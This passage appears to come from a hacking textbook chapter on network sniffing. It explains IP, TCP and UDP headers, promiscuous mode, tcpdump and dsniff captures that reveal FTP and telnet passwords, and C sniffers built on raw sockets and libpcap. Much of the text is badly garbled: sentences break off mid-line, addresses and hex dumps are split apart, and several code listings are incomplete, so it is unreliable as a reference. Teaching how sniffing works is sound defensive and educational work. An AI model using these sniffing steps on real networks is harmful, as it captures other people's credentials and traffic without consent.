 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version|  IHL  |Type of Service|          Total Length         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Identification        |Flags|      Fragment Offset    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Time to Live |    Protocol   |         Header Checksum       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                       Source Address                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Destination Address                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Options                    |    Padding    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Example Internet Datagram Header
Figure 4
...

This surprisingly descriptive ASCII diagram shows these fields and their
positions in the header
...

Similar to the Ethernet header, the IP header also has a protocol field to
describe the type of data in the packet and the source and destination
addresses for routing
...
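To make the field layout concrete, the following sketch pulls a few fields out of a raw header and verifies the header checksum. The 20 sample bytes are the first 20 bytes of a packet from the tcpdump capture shown later in this chapter; the names sample_ip_header, ip_summary, summarize_ip_header(), and ip_header_checksum_ok() are hypothetical. The checksum rule used here (the one's-complement sum of all 16-bit header words, checksum field included, comes out as 0xffff for an intact header) is the one defined in RFC 791.

```c
#include <stdint.h>

/* First 20 bytes (the IP header) of a packet from the tcpdump capture. */
const unsigned char sample_ip_header[20] = {
    0x45, 0x00, 0x00, 0x5d, 0xe0, 0x65, 0x40, 0x00, 0x80, 0x06,
    0x97, 0xad, 0xc0, 0xa8, 0x00, 0x76, 0xc0, 0xa8, 0x00, 0xc1
};

struct ip_summary {
    unsigned int version;     /* upper 4 bits of byte 0 */
    unsigned int header_len;  /* IHL (lower 4 bits of byte 0) in bytes */
    unsigned int total_len;   /* 16-bit total length, network byte order */
    unsigned int ttl;         /* time to live */
    unsigned int protocol;    /* type of data carried (6 is TCP) */
};

void summarize_ip_header(const unsigned char *hdr, struct ip_summary *out) {
    out->version = hdr[0] >> 4;
    out->header_len = (hdr[0] & 0x0f) * 4;   /* IHL counts 32-bit words */
    out->total_len = ((unsigned int)hdr[2] << 8) | hdr[3];
    out->ttl = hdr[8];
    out->protocol = hdr[9];
}

/* Returns 1 if the one's-complement sum over the header is 0xffff. */
int ip_header_checksum_ok(const unsigned char *hdr) {
    unsigned int header_len = (hdr[0] & 0x0f) * 4;
    uint32_t sum = 0;
    unsigned int i;

    for (i = 0; i + 1 < header_len; i += 2)
        sum += ((uint32_t)hdr[i] << 8) | hdr[i + 1];
    while (sum >> 16)                        /* fold carries back into 16 bits */
        sum = (sum & 0xffff) + (sum >> 16);
    return sum == 0xffff;
}
```

For the sample bytes this gives version 4, a 20-byte header, a total length of 93 bytes, a TTL of 128, and protocol 6 (TCP), and the checksum test passes.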

The Internet Protocol is mostly used to transmit packets wrapped in
higher layers
...
ICMP packets are used for messaging and diagnostics
...
If there’s a problem, an ICMP packet
is sent back to notify the sender of the problem
...
ICMP Echo Request
and Echo Reply messages are used by a utility called ping
...
Upon receipt of the ICMP Echo Request, the
remote host sends back an ICMP Echo Reply
...
However, it is
important to remember that ICMP and IP are both connectionless; all this
protocol layer really cares about is getting the packet to its destination address
...
IP can deal with this situation by fragmenting
packets, as shown here
...
Each fragment has a different fragment offset value, which is stored
in the header
...

Provisions such as fragmentation aid in the delivery of IP packets, but
this does nothing to maintain connections or ensure delivery
...

0x433 Transport Layer
The transport layer can be thought of as the first line of office receptionists,
picking up the mail from the network layer
...
Then the receptionist would follow
the return protocol by asking for a receipt and eventually issuing an RMA
number so the customer can mail the product in
...


The two major protocols at this layer are the Transmission Control
Protocol (TCP) and User Datagram Protocol (UDP)
...
One of
the reasons for TCP’s popularity is that it provides a transparent, yet reliable
and bidirectional, connection between two IP addresses
...
A bidirectional connection with TCP is similar to using
a telephone—after dialing a number, a connection is made through which
both parties can communicate
...
If the packets
of a connection get jumbled up and arrive out of order, TCP will make sure
they’re put back in order before handing the data up to the next layer
...

All of this functionality is made possible by a set of flags, called TCP flags,
and by tracking values called sequence numbers
...
The TCP header is specified in RFC 793
...

3
...

FUNCTIONAL SPECIFICATION

Header Format

TCP segments are sent as internet datagrams
...
A TCP header follows the internet
header, supplying information specific to the TCP protocol
...

TCP Header Format

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|          Source Port          |       Destination Port        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                        Sequence Number                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Acknowledgment Number                      |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Data |           |U|A|P|R|S|F|                               |
| Offset| Reserved  |R|C|S|S|Y|I|            Window             |
|       |           |G|K|H|T|N|N|                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Checksum            |         Urgent Pointer        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Options                    |    Padding    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                             data                              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
TCP Header Format
Note that one tick mark represents one bit position
...

The sequence number and acknowledgment number are used to maintain
state
...
When a client wants to open a connection
with a server, a packet with the SYN flag on, but the ACK flag off, is sent to
the server
...
To complete the connection, the client sends back a
packet with the SYN flag off but the ACK flag on
...

Only the first two packets of the connection have the SYN flag on, since those
packets are used to synchronize sequence numbers
...
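The flag combinations used while opening a connection can be told apart with two bit tests. In this sketch the constants carry the same values as the TH_ flag definitions in the system's TCP header file, but the SKETCH_ names, the enum, and classify_handshake_flags() are all hypothetical.

```c
/* Flag bit values, matching TH_FIN through TH_URG. */
#define SKETCH_TH_FIN  0x01
#define SKETCH_TH_SYN  0x02
#define SKETCH_TH_RST  0x04
#define SKETCH_TH_PUSH 0x08
#define SKETCH_TH_ACK  0x10
#define SKETCH_TH_URG  0x20

enum handshake_step {
    STEP_OTHER = 0,  /* neither SYN nor ACK set */
    STEP_SYN,        /* SYN on, ACK off: client asks to open a connection */
    STEP_SYN_ACK,    /* SYN on, ACK on: server's response */
    STEP_ACK         /* SYN off, ACK on: handshake completion and later packets */
};

/* Classify a TCP flags byte by its SYN and ACK bits only. */
enum handshake_step classify_handshake_flags(unsigned char th_flags) {
    int syn = (th_flags & SKETCH_TH_SYN) != 0;
    int ack = (th_flags & SKETCH_TH_ACK) != 0;

    if (syn && !ack)
        return STEP_SYN;
    if (syn && ack)
        return STEP_SYN_ACK;
    if (ack)
        return STEP_ACK;
    return STEP_OTHER;
}
```

A flags byte of 0x18 (PUSH and ACK together), which is common for packets carrying data, is classified as STEP_ACK because only the SYN and ACK bits are examined.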

When a connection is initiated, each side generates an initial sequence
number
...
Then, with each packet that is sent,
the sequence number is incremented by the number of bytes found in the
data portion of the packet
...
In addition, each TCP header has an acknowledgment number,
which is simply the other side’s sequence number plus one
...
However, the cost of this functionality is paid in communication overhead
...
This
lack of functionality makes it behave much like the IP protocol: It is connectionless and unreliable
...
Sometimes connections aren’t needed, and the lightweight UDP is a much better protocol for these situations
...
It only contains four 16-bit values in this
order: source port, destination port, length, and checksum
...
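Since the UDP header is just four 16-bit values, decoding it takes only a few lines. The structure and function names below (udp_hdr_sketch, read_be16(), parse_udp_header()) are hypothetical; the sketch reads each value byte by byte so that it gives the same result on little-endian and big-endian hosts.

```c
#include <stdint.h>

struct udp_hdr_sketch {
    uint16_t src_port;   /* source port */
    uint16_t dest_port;  /* destination port */
    uint16_t length;     /* length of UDP header plus data, in bytes */
    uint16_t checksum;   /* checksum */
};

/* Read a 16-bit big-endian (network byte order) value from two bytes. */
static uint16_t read_be16(const unsigned char *p) {
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Decode the 8-byte UDP header at bytes into host-order fields. */
void parse_udp_header(const unsigned char *bytes, struct udp_hdr_sketch *out) {
    out->src_port  = read_be16(bytes);
    out->dest_port = read_be16(bytes + 2);
    out->length    = read_be16(bytes + 4);
    out->checksum  = read_be16(bytes + 6);
}
```

For the bytes 1e d2 00 35 00 0c ab cd, the decoded values are source port 7890, destination port 53, length 12, and checksum 0xabcd.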
On an unswitched network, Ethernet packets pass through every
device on the network, and each device is expected to look only at the
packets sent to its own address
...
Most packet-capturing programs, such as tcpdump,
drop the device they are listening to into promiscuous mode by default
...

reader@hacking:~/booksrc $ ifconfig eth0
eth0
Link encap:Ethernet HWaddr 00:0C:29:34:61:65
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:17115 errors:0 dropped:0 overruns:0 frame:0
TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4602913 (4
...
2 KiB)
Interrupt:16 Base address:0x2024
reader@hacking:~/booksrc $ sudo ifconfig eth0 promisc
reader@hacking:~/booksrc $ ifconfig eth0
eth0
Link encap:Ethernet HWaddr 00:0C:29:34:61:65
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:17181 errors:0 dropped:0 overruns:0 frame:0
TX packets:1927 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4668475 (4
...
2 KiB)

Interrupt:16 Base address:0x2024
reader@hacking:~/booksrc $

The act of capturing packets that aren’t necessarily meant for public viewing is called sniffing
...

reader@hacking:~/booksrc $ sudo tcpdump -l -X 'ip host 192
...
0
...
684964 192
...
0
...
ftp > 192
...
0
...
32778: P 1:42(41) ack 1 win
17316 (DF)
0x0000 4500 005d e065 4000 8006 97ad c0a8 0076
E
...
v
0x0010 c0a8 00c1 0015 800a 292e 8a73 5ed4 9ce8

...

0x0020 8018 43a4 a12f 0000 0101 080a 0007 1f78

...
x
0x0030 000e 0a8a 3232 3020 5459 5053 6f66 7420

...
TYPSoft
...
Server
...
99
...
685132 192
...
0
...
32778 > 192
...
0
...
ftp:
...
4
...

0x0010 c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c

...

0x0020 8010 16d0 81db 0000 0101 080a 000e 0c56

...
x
21:27:52
...
168
...
193
...
168
...
118
...
p@
...
v
...
Z
0x0030 0007 1f78 5553 4552 206c 6565 6368 0d0a

...
leech
...
415487 192
...
0
...
ftp > 192
...
0
...
32778: P 42:76(34) ack 13
win 17304 (DF)
0x0000 4500 0056 e0ac 4000 8006 976d c0a8 0076
E
...
m
...

0x0020 8018 4398 4e2c 0000 0101 080a 0007 1fc5

...
N,
...
Z331
...
required
...
le
0x0050 6563
ec
21:27:52
...
168
...
193
...
168
...
118
...
ack 76 win 5840
(DF) [tos 0x10]
0x0000 4510 0034 9671 4000 4006 21bb c0a8 00c1
E
...
q@
...
v
...
[
0x0030 0007 1fc5

...
155458 192
...
0
...
32778 > 192
...
0
...
ftp: P 13:27(14) ack 76
win 5840 (DF) [tos 0x10]
0x0000 4510 0042 9672 4000 4006 21ac c0a8 00c1
E
...
r@
...
v
...

0x0030 0007 1fc5 5041 5353 206c 3840 6e69 7465

...
l8@nite
0x0040 0d0a

...
179427 192
...
0
...
ftp > 192
...
0
...
32778: P 76:103(27) ack 27
win 17290 (DF)
0x0000 4500 004f e0cc 4000 8006 9754 c0a8 0076
E
...
T
...


0x0020 8018 438a 4c8c 0000 0101 080a 0007 1feb
0x0030 000e 10d1 3233 3020 5573 6572 206c 6565
0x0040 6368 206c 6f67 6765 6420 696e 2e0d 0a

...
L
...
230
...
lee
ch
...
in
...
In the preceding example, the user leech is seen logging
into an FTP server using the password l8@nite
...

tcpdump is a wonderful, general-purpose packet sniffer, but there are
specialized sniffing tools designed specifically to search for usernames and
passwords
...

reader@hacking:~/booksrc $ sudo dsniff -n
dsniff: listening on eth0
----------------12/10/02 21:43:21 tcp 192
...
0
...
32782 -> 192
...
0
...
21 (ftp)
USER leech
PASS l8@nite
----------------12/10/02 21:47:49 tcp 192
...
0
...
32785 -> 192
...
0
...
23 (telnet)
USER root
PASS 5eCr3t

0x441 Raw Socket Sniffer
So far in our code examples, we have been using stream sockets
...
When the OSI model is accessed at the session (5) layer, the
operating system takes care of all of the lower-level details of transmission,
correction, and routing
...
At this lower layer, all the details are exposed and must be
handled explicitly by the programmer
...
In this case, the protocol matters since there are multiple
options
...
The
following example is a TCP sniffing program using raw sockets
...
c
#include
#include
#include
#include
#include
#include

...
h>
...
h>
...
h>

#include "hacking
...
Notice that buffer is
declared as a u_char variable
...
h that expands to “unsigned char
...

When compiled, the program needs to be run as root, because the use
of raw sockets requires root access
...

reader@hacking:~/booksrc $ gcc -o raw_tcpsniff raw_tcpsniff
...
/raw_tcpsniff
[!!] Fatal Error in socket: Operation not permitted
reader@hacking:~/booksrc $ sudo
...
D
...
F#
...
l
...
2G
...
;e
...

Got a 70 byte packet
45 10 00 46 1e 37 40 00 40 06 46 20 c0 a8 2a 01 | E
...
7@
...

c0 a8 2a f9 8b 12 1e d2 ac 14 cf a2 e5 10 6c c9 |
...

80 18 05 b4 27 95 00 00 01 01 08 0a 26 ab a0 75 |
...
(AAAAAAAAAAAA
41 41 41 41 0d 0a                               | AAAA
...
G
...
F
...
l
...
hE
...
fjsdalkfjask
66 6a 61 73 64 0d 0a                            | fjasd
...
Also, it only captures
TCP packets—to capture UDP or ICMP packets, additional raw sockets need
to be opened for each
...
Raw socket code for Linux most
likely won’t work on BSD or Solaris
...


0x442 libpcap Sniffer
A standardized programming library called libpcap can be used to smooth
out the inconsistencies of raw sockets
...
Both tcpdump and dsniff use
libpcap, which allows them to compile with relative ease on any platform
...
These functions are quite intuitive, so we will discuss
them using the following code listing
...
c
#include ...
h"
void pcap_fatal(const char *failed_in, const char *errbuf) {
printf("Fatal Error in %s: %s\n", failed_in, errbuf);
exit(1);
}

First, pcap
...
Also, I’ve written a pcap_fatal() function for displaying
fatal errors
...

int main() {
struct pcap_pkthdr header;
const u_char *packet;
char errbuf[PCAP_ERRBUF_SIZE];
char *device;
pcap_t *pcap_handle;
int i;

The errbuf variable is the aforementioned error buffer, its size coming
from a define in pcap
...
The header variable is a pcap_pkthdr structure
containing extra capture information about the packet, such as when it was
captured and its length
...

device = pcap_lookupdev(errbuf);
if(device == NULL)
pcap_fatal("pcap_lookupdev", errbuf);
printf("Sniffing on device %s\n", device);

The pcap_lookupdev() function looks for a suitable device to sniff on
...
For
our system this will always be /dev/eth0, although it will be different on a BSD
system
...


pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
if(pcap_handle == NULL)
pcap_fatal("pcap_open_live", errbuf);

Similar to the socket function and file open function, the pcap_open_live()
function opens a packet-capturing device, returning a handle to it
...
Since we
want to capture in promiscuous mode, the promiscuous flag is set to 1
...
len);
dump(packet, header
...

This function is passed the pcap_handle and a pointer to a pcap_pkthdr structure so it can fill it with details of the capture
...
Then pcap_close() closes the capture interface
...
This
can be done using the -l flag with GCC, as shown in the output below
...

reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff
...
o: In function `main':
pcap_sniff
...
text+0x1c8): undefined reference to `pcap_lookupdev'
pcap_sniff
...
text+0x233): undefined reference to `pcap_open_live'
pcap_sniff
...
text+0x282): undefined reference to `pcap_next'
pcap_sniff
...
text+0x2c2): undefined reference to `pcap_close'
collect2: ld returned 1 exit status
reader@hacking:~/booksrc $ gcc -o pcap_sniff pcap_sniff
...
/pcap_sniff
Fatal Error in pcap_lookupdev: no suitable device found
reader@hacking:~/booksrc $ sudo
...
l
...
e
...

00 44 1e 39 40 00 40 06 46 20 c0 a8 2a 01 c0 a8 |
...
9@
...

2a f9 8b 12 1e d2 ac 14 cf c7 e5 10 6c c9 80 18 | *
...

05 b4 54 1a 00 00 01 01 08 0a 26 b6 a7 76 02 3c |
...
v
...
this is a test
0d 0a
|
...
e
...
P
...

00 34 3d 2c 40 00 40 06 27 4d c0 a8 2a f9 c0 a8 |
...
'M
...
l
...
G'l&
...
v
15
1d
d7
0a
41

65
c0
e5
26
41

b6
a8
10
b6
41

08
2a
6c
a9
41

00
01
c9
c8
41

45
c0
80
02
41

10
a8
18
47
41

|
|
|
|
|
|

...
P
...
E
...
F
...

*
...

...

Notice that there are many bytes preceding the sample text in the packet
and many of these bytes are similar
...

0x443 Decoding the Layers
In our packet captures, the outermost layer is Ethernet, which is also the
lowest visible layer
...
The header for this layer contains the source
MAC address, the destination MAC address, and a 16-bit value that describes
the type of Ethernet packet
...
h and the structures for the IP header and
TCP header are located in /usr/include/netinet/ip
...
h, respectively
...
A better understanding can be gained from writing our own
structures, so let’s use the structure definitions as guidance to create our
own packet header structures to include in hacking-network
...

First, let’s look at the existing definition of the Ethernet header
...
h
#define ETH_ALEN 6   /* Octets in one ethernet addr */
#define ETH_HLEN 14  /* Total octets in header */

/*
* This is an Ethernet frame header
...
The
variable declaration of __be16 turns out to be a type definition for a 16-bit
unsigned short integer
...


reader@hacking:~/booksrc $
$ grep -R "typedef
...
h:typedef __u16 __bitwise __be16;
$ grep -R "typedef
...
h:typedef unsigned short __u16;
/usr/include/linux/cramfs_fs
...
h:typedef unsigned short __u16;
$

The include file also defines the Ethernet header length in ETH_HLEN as
14 bytes
...
However, many compilers will pad structures along 4-byte boundaries
for alignment, which means that sizeof(struct ethhdr) would return an
incorrect size
...

By including ...
Since we want to make
our own structures for hacking-network
...
While we’re at it, let’s give these fields better names
...
h
#define ETHER_ADDR_LEN 6
#define ETHER_HDR_LEN 14
struct ether_hdr {
unsigned char ether_dest_addr[ETHER_ADDR_LEN]; // Destination MAC address
unsigned char ether_src_addr[ETHER_ADDR_LEN]; // Source MAC address
unsigned short ether_type; // Type of Ethernet packet
};
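As a quick check of this structure, the sketch below fills it from the first 14 bytes of a frame and returns the type field in host byte order. The structure is repeated so the example stands alone; decode_ether_type() is a hypothetical helper, and copying field by field is a choice made here so that the result does not depend on how the compiler lays out the structure.

```c
#include <arpa/inet.h>
#include <string.h>

#define ETHER_ADDR_LEN 6
#define ETHER_HDR_LEN 14

struct ether_hdr {
    unsigned char ether_dest_addr[ETHER_ADDR_LEN]; // Destination MAC address
    unsigned char ether_src_addr[ETHER_ADDR_LEN];  // Source MAC address
    unsigned short ether_type;                     // Type of Ethernet packet
};

/* Hypothetical helper: copy the Ethernet header fields out of a raw frame
 * and return the type value converted to host byte order. */
unsigned short decode_ether_type(const unsigned char *frame, struct ether_hdr *out) {
    memcpy(out->ether_dest_addr, frame, ETHER_ADDR_LEN);
    memcpy(out->ether_src_addr, frame + ETHER_ADDR_LEN, ETHER_ADDR_LEN);
    memcpy(&out->ether_type, frame + 2 * ETHER_ADDR_LEN, sizeof(out->ether_type));
    return ntohs(out->ether_type);   /* type is stored in network byte order */
}
```

For a broadcast frame from 00:00:00:aa:aa:aa whose type bytes are 08 06, the function returns 0x0806, the Ethernet type value for ARP.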

We can do the same thing with the IP and TCP structures, using the
corresponding structures and RFC diagrams as a reference
...
h
struct iphdr
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
unsigned int ihl:4;
unsigned int version:4;
#elif __BYTE_ORDER == __BIG_ENDIAN
unsigned int version:4;
unsigned int ihl:4;
#else
# error "Please fix ...
*/
};

From RFC 791
    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
                    Example Internet Datagram Header

Each element in the structure corresponds to the fields shown in the
RFC header diagram
...
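These fields are in network byte order, so on a little-endian host the
structure declares IHL before Version: both 4-bit fields share the first byte
of the header, and compilers for little-endian hosts typically allocate bit
fields starting from the low-order bits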
...
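A portable alternative to relying on bit-field order is to pull both values out of the first header byte with a shift and a mask. The sketch below assumes only the RFC 791 layout; the function names ip_version() and ip_header_bytes() are made up for this example.

```c
#include <stdint.h>

/* First byte of an IPv4 header: Version is the high nibble, IHL the low nibble. */
unsigned ip_version(uint8_t first_byte) {
    return first_byte >> 4;
}

/* IHL counts 32-bit words, so the header length in bytes is IHL * 4. */
unsigned ip_header_bytes(uint8_t first_byte) {
    return (first_byte & 0x0F) * 4u;
}
```

For the common first byte 0x45, this gives version 4 and a 20-byte header; any IP options make the IHL larger than 5.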

Added to hacking-network
...
IP headers are always
20 bytes
...
h
for the structure and RFC 793 for the header diagram
...
h
typedef u_int32_t tcp_seq;
/*
* TCP header
...

*/
struct tcphdr
{
    u_int16_t th_sport;     /* source port */
    u_int16_t th_dport;     /* destination port */
    tcp_seq th_seq;         /* sequence number */
    tcp_seq th_ack;         /* acknowledgment number */
#  if __BYTE_ORDER == __LITTLE_ENDIAN
    u_int8_t th_x2:4;       /* (unused) */
    u_int8_t th_off:4;      /* data offset */
#  endif
#  if __BYTE_ORDER == __BIG_ENDIAN
    u_int8_t th_off:4;      /* data offset */
    u_int8_t th_x2:4;       /* (unused) */
#  endif
    u_int8_t th_flags;
#  define TH_FIN    0x01
#  define TH_SYN    0x02
#  define TH_RST    0x04
#  define TH_PUSH   0x08
#  define TH_ACK    0x10
#  define TH_URG    0x20
    u_int16_t th_win;       /* window */
    u_int16_t th_sum;       /* checksum */
    u_int16_t th_urp;       /* urgent pointer */
};

From RFC 793
TCP Header Format
    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          Source Port          |       Destination Port        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                        Sequence Number                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Acknowledgment Number                      |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Data |           |U|A|P|R|S|F|                               |
   | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
   |       |           |G|K|H|T|N|N|                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |           Checksum            |         Urgent Pointer        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                             data                              |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Data Offset: 4 bits
The number of 32 bit words in the TCP Header
...
The TCP header (even one including options) is an
integral number of 32 bits long
...
Must be zero
...
The data offset field is important, since it tells the size of the variable-length TCP header
...
This is because the RFC defines this
field as optional
...
So the TCP
header size in bytes equals the data offset field from the header times four
...
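The multiplication can be sketched in a few lines. This assumes tcp_header points at the first byte of a TCP header laid out as in RFC 793, where the data offset occupies the high four bits of byte 12; tcp_header_bytes() is a hypothetical helper, not one of the functions used elsewhere in this section.

```c
#include <stdint.h>

/* Byte 12 of a TCP header holds the 4-bit data offset in its high nibble
 * (the low nibble belongs to the reserved field). */
unsigned tcp_header_bytes(const uint8_t *tcp_header) {
    unsigned data_offset_words = tcp_header[12] >> 4; /* count of 32-bit words */
    return data_offset_words * 4;                     /* convert words to bytes */
}
```

A data offset of 8 yields a 32-byte header (20 bytes plus 12 bytes of options), while the minimum valid offset of 5 yields the plain 20-byte header.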

The th_flags field of Linux’s tcphdr structure is defined as an 8-bit unsigned
character
...

Added to hacking-network
...
But before we do, let’s talk
about libpcap for a moment
...
Very few programs actually use pcap_next(), because it’s clumsy and
inefficient
...
This means
the pcap_loop() function is passed a function pointer, which is called every
time a packet is captured
...
If the count argument is set to -1, it will loop until the program
breaks out of it
...
Naturally, the callback function needs to
follow a certain prototype, since pcap_loop() must call this function
...
It can be used to pass additional information to the
callback function, but we aren’t going to be using this
...
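The callback arrangement can be pictured with plain function pointers. The sketch below is a toy stand-in, not libpcap: demo_handler, demo_loop(), and demo_count_bytes() are invented names, and the packets come from an in-memory array rather than a capture device. It only shows the shape of the idea, which is a loop that owns the iteration and hands each packet, plus a user pointer, to a caller-supplied function.

```c
#include <stddef.h>

/* Hypothetical callback type modeled loosely on a capture handler:
 * a user pointer, a length, and the packet bytes. Not the libpcap API. */
typedef void (*demo_handler)(void *user, size_t len, const unsigned char *bytes);

/* Toy dispatcher: calls `callback` once per stored packet, stopping after
 * `count` packets, or running through all of them when count is negative.
 * Returns the number of packets delivered. */
int demo_loop(const unsigned char *const *packets, const size_t *lengths,
              size_t n_packets, int count, demo_handler callback, void *user) {
    int delivered = 0;
    for (size_t i = 0; i < n_packets; i++) {
        if (count >= 0 && delivered >= count)
            break;
        callback(user, lengths[i], packets[i]);
        delivered++;
    }
    return delivered;
}

/* Example callback: adds each packet's length to a running total
 * that the caller passed in through the user pointer. */
void demo_count_bytes(void *user, size_t len, const unsigned char *bytes) {
    (void)bytes;              /* contents are not needed for counting */
    *(size_t *)user += len;
}
```

The user pointer plays the same role as the final argument described above: it lets the caller smuggle its own state into the callback without global variables.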

The following example code uses pcap_loop() with a callback function to
capture packets and our header structures to decode them
...

decode_sniff
...
h>
#include "hacking
...
h"
void pcap_fatal(const char *, const char *);
void decode_ethernet(const u_char *);
void decode_ip(const u_char *);
u_int decode_tcp(const u_char *);
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);

int main() {
   struct pcap_pkthdr cap_header;
   const u_char *packet, *pkt_data;
   char errbuf[PCAP_ERRBUF_SIZE];
   char *device;
   pcap_t *pcap_handle;

   device = pcap_lookupdev(errbuf);
   if(device == NULL)
      pcap_fatal("pcap_lookupdev", errbuf);

   printf("Sniffing on device %s\n", device);

   pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
   if(pcap_handle == NULL)
      pcap_fatal("pcap_open_live", errbuf);

   pcap_loop(pcap_handle, 3, caught_packet, NULL);

   pcap_close(pcap_handle);
}

At the beginning of this program, the prototype for the callback function, called caught_packet(), is declared along with several decoding functions
...
This function is passed the
pcap_handle, told to capture three packets, and pointed to the callback function, caught_packet()
...
Also, notice that the decode_tcp()
function returns a u_int
...

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) {
   int tcp_header_length, total_header_size, pkt_data_len;
   u_char *pkt_data;

   printf("==== Got a %d byte packet ====\n", cap_header->len);

   decode_ethernet(packet);
   decode_ip(packet+ETHER_HDR_LEN);
   tcp_header_length = decode_tcp(packet+ETHER_HDR_LEN+sizeof(struct ip_hdr));

   total_header_size = ETHER_HDR_LEN+sizeof(struct ip_hdr)+tcp_header_length;
   pkt_data = (u_char *)packet + total_header_size; // pkt_data points to the data portion
...
This function uses the header lengths to split the packet up by layers
and the decoding functions to print out details of each layer’s header
...
This allows accessing various
fields of the header, but it’s important to remember these values will be in
network byte order
...
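Because multi-byte header fields arrive in network byte order, they usually need ntohs() or ntohl() before being printed or compared. The sketch below reads the 16-bit type field from a raw Ethernet frame; ether_type_host_order() is a hypothetical helper, and the offset of 12 follows from the two 6-byte MAC addresses that precede the field.

```c
#include <arpa/inet.h>  /* ntohs() */
#include <stdint.h>
#include <string.h>

/* Reads the 16-bit EtherType at offset 12 of an Ethernet frame and
 * converts it from network (big-endian) to host byte order. */
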